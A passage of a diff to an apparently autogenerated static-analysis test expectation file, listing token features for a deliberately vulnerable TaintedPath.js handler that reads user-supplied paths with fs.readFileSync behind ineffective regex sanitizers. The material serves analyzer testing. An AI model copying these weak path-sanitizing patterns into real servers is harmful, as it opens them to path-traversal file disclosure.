/[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:182:9:182:13 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:182:9:182:13 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:182:15:182:16 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:15:182:16 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:15:182:16 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:182:15:182:16 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:182:15:182:16 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:182:15:182:29 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:15:182:29 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:15:182:29 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:182:15:182:29 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:182:15:182:29 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:182:15:182:55 | exceptional return of fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:15:182:55 | exceptional return of fs.read ... g, '')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:182:15:182:55 | exceptional return of fs.read ... g, '')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:182:15:182:55 | exceptional return of fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:182:15:182:55 | exceptional return of fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:182:15:182:55 | fs.read ... g, '')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:182:15:182:55 | fs.read ... g, '')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:182:15:182:55 | fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | @@ -6337,6 +64820,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:182:15:182:55 | fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:182:15:182:55 | fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:182:15:182:55 | fs.read ... g, '')) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:182:18:182:29 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:18:182:29 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:18:182:29 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:182:18:182:29 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:182:18:182:29 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:182:31:182:34 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:31:182:34 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:31:182:34 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:182:31:182:34 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:182:31:182:34 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:182:31:182:42 | path.replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:31:182:42 | path.replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:31:182:42 | path.replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:182:31:182:42 | path.replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:182:31:182:42 | path.replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:182:31:182:54 | exceptional return of path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:31:182:54 | exceptional return of path.re ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:182:31:182:54 | exceptional return of path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:182:31:182:54 | exceptional return of path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:182:31:182:54 | exceptional return of path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:182:31:182:54 | path.re ... /g, '') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:182:31:182:54 | path.re ... /g, '') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:182:31:182:54 | path.re ... /g, '') | calleeImports | fs | @@ -6346,6 +64849,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:182:31:182:54 | path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:182:31:182:54 | path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:182:31:182:54 | path.re ... /g, '') | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:182:36:182:42 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:36:182:42 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:36:182:42 | replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:182:36:182:42 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:182:36:182:42 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:182:44:182:49 | /[.]/g | CalleeFlexibleAccessPath | path.replace | | autogenerated/TaintedPath/TaintedPath.js:182:44:182:49 | /[.]/g | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:182:44:182:49 | /[.]/g | calleeImports | url | @@ -6364,6 +64872,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:182:52:182:53 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:182:52:182:53 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:182:52:182:53 | '' | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:183:4:183:6 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:4:183:6 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:4:183:6 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:183:4:183:6 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:183:4:183:6 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:183:4:183:12 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:4:183:12 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:4:183:12 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:183:4:183:12 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:183:4:183:12 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:183:4:183:56 | exceptional return of res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:4:183:56 | exceptional return of res.wri ... , ''))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:183:4:183:56 | exceptional return of res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:183:4:183:56 | exceptional return of res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:183:4:183:56 | exceptional return of res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:183:4:183:56 | res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:4:183:56 | res.wri ... , ''))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:4:183:56 | res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:183:4:183:56 | res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:183:4:183:56 | res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:183:8:183:12 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:8:183:12 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:8:183:12 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:183:8:183:12 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:183:8:183:12 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:183:14:183:15 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:14:183:15 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:14:183:15 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:183:14:183:15 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:183:14:183:15 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:183:14:183:28 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:14:183:28 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:183:14:183:28 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:183:14:183:28 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:183:14:183:28 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| 